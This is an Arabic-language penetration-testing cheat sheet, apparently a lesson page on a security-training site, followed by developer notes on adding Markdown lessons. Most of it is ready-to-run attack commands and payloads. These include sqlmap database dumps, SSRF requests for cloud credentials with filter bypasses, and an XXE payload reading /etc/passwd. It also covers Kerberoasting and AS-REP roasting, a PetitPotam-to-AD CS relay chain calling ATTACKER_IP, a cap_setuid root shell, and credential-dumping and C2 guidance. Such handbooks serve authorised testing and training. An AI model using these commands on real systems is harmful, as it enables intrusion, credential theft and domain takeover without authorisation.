دليل الاستغلال السريع (Exploit Handbook)

مختصر تقني مكثف بصيغة Markdown، يستعرض أهم التقنيات المستخدمة في مراحل الاستطلاع (Recon)، واختراق الويب، وبيئات Active Directory، وتصعيد صلاحيات Linux، ومرحلة ما بعد الاختراق (Post-Exploitation). صُمم هذا الدليل ليكون مرجعاً سريعاً أثناء المهام الميدانية والعمليات المصرح بها.

[!warning] تنبيه: للاستخدام المصرح به فقط جميع الأوامر والتقنيات الواردة أدناه ذات طبيعة هجومية أو تخريبية. يقتصر استخدامها حصرياً على المختبرات الخاصة، أو منافسات الـ CTF، أو ضمن نطاق اختبار اختراق (Pentest) معتمد وموثق قانونياً.

الاستطلاع وجمع المعلومات (Reconnaissance)

تعداد النطاقات الفرعية (Subdomain enumeration)

لتحقيق أقصى استفادة، يفضل الدمج بين عدة مصادر: سجلات DNS السلبية، شفافية الشهادات (Certificate Transparency)، والهجوم الشامل (Brute-force).

$ subfinder -d target.com -all -silent | tee subs.txt
$ amass enum -passive -d target.com >> subs.txt
$ crt.sh -d target.com >> subs.txt
$ sort -u subs.txt | httpx -silent -title -tech-detect -status-code

فحص المنافذ وتحديد بصمات الخدمات (Port + Service fingerprinting)

$ nmap -sV -sC -T4 -p- --min-rate=2000 target.com -oA full
$ nmap --script vuln -p 80,443,445 target.com

nmap -sS

masscan

naabu

rustscan

ثغرات الويب (Web Vulnerabilities)

حقن SQL (المعتمد على UNION)

$ sqlmap -u "https://target.com/item?id=1" --batch --dbs --risk=3 --level=5
$ sqlmap -u "..." -D appdb --tables
$ sqlmap -u "..." -D appdb -T users --dump

ثغرات SSRF ← الوصول لبيانات التعريف السحابية (Cloud Metadata)

# AWS IMDSv1
$ curl 'https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'
$ 
# GCP
$ curl 'https://target.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/' -H 'Metadata-Flavor: Google'

[!tip] تجاوز آليات الحماية إذا كانت الفلاتر تحجب العنوان

169.254.169.254

مباشرة، جرب استخدام

0

أو

127.1

أو

[::1]

أو تقنية إعادة ربط الـ DNS (DNS rebinding) عبر خدمات مثل

1u.ms

أو

nip.io

.

ثغرات XXE (النمط الكلاسيكي)

 xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

دليل النشاط (Active Directory)

هجوم Kerberoasting

$ GetUserSPNs.py -request -dc-ip 10.0.0.1 corp.local/lowpriv:'Pass1' -outputfile spns.txt
$ hashcat -m 13100 spns.txt rockyou.txt

هجوم AS-REP Roasting

$ GetNPUsers.py corp.local/ -dc-ip 10.0.0.1 -usersfile users.txt -no-pass -format hashcat
$ hashcat -m 18200 asrep.txt rockyou.txt

هجوم NTLM Relay (من PetitPotam إلى AD CS)

$ ntlmrelayx.py -t http://CA-server/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
$ PetitPotam.py -u '' -p '' ATTACKER_IP DC_IP

[!danger] الوصول لامتيازات مدير الدومين (DA) في 5 دقائق لا تزال سلسلة هجمات PetitPotam المؤدية إلى AD CS فعالة في بيئات ESC8 غير المرقّعة. يمكن الحد من هذا الخطر عبر تفعيل خاصية Extended Protection for Authentication (EPA) وفرض التوقيع (Signing) على واجهات الويب الخاصة بـ CA.

تصعيد الصلاحيات في أنظمة Linux

# التعداد والفحص الشامل
$ linpeas.sh | tee peas.out
$ 
# البحث عن ملفات SUID المرتبطة بمدخلات في GTFOBins
$ find / -perm -4000 -type f 2>/dev/null

الهروب عبر قدرات النظام (Capabilities)

$ getcap -r / 2>/dev/null
# إذا كان Python يمتلك قدرة cap_setuid:
$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

مرحلة ما بعد الاختراق (Post-Exploitation)

• ضمان الاستمرارية (Persistence): عبر المهام المجدولة (Scheduled tasks)، أو وحدات systemd، أو cron، أو مفاتيح تشغيل السجل (Registry Run keys)، أو اشتراكات أحداث WMI.
• الوصول لبيانات الاعتماد (Credential Access): استخدام

  mimikatz sekurlsa::logonpasswords

  أو

  lsassy

  أو استخراج مفاتيح DPAPI الرئيسية.
• الحركة الجانبية (Lateral Movement): عبر أدوات

  wmiexec

  و

  psexec

  و

  evil-winrm

  أو استخدام RDP مع انتحال الرموز (Token impersonation).
• منصات التحكم (C2): مثل Sliver أو Mythic أو Cobalt Strike باستخدام HTTPS عبر نطاقات CDN متغيرة.

[!info] خصائص Markdown المستخدمة هنا يتم عرض هذه الصفحة بالكامل من ملف

content/lessons/exploit-handbook.ar.md

باستخدام

react-markdown

ومعالج مخصص. تتيح لك هذه البيئة: جداول GFM، تمييز الكود البرمجي، كتل أوامر الطرفية (Terminal blocks)، تنبيهات GitHub (

[!warn]

,

[!tip]

,

[!danger]

,

[!info]

)، والربط التلقائي للعناوين، مع فهرس محتويات (TOC) مثبت على الجانب.

إضافة دروس جديدة بصيغة Markdown

1. قم بإنشاء الملفات:

   content/lessons/<slug>.ar.md

   و

   content/lessons/<slug>.en.md

   .
2. أضف مدخلاً جديداً في قائمة

   LESSONS

   ضمن ملف

   lib/lessons.ts

   باستخدام الـ slug المختار.
3. أنشئ ملف الصفحة

   app/lessons/<slug>/page.tsx

   بحيث يحتوي فقط على:

 tsx
import { MarkdownLesson } from "@/components/MarkdownLesson";
import { readMd } from "@/lib/content";

export default async function Page() {
  const ar = await readMd("<slug>", "ar");
  const en = await readMd("<slug>", "en");
  return <MarkdownLesson slug="<slug>" ar={ar} en={en} />;
}

بذلك، سيتم ربط الشريط الجانبي، وتتبع التقدم، والتنقل بين الدروس، وتبديل اللغة، وفهرس المحتويات تلقائياً.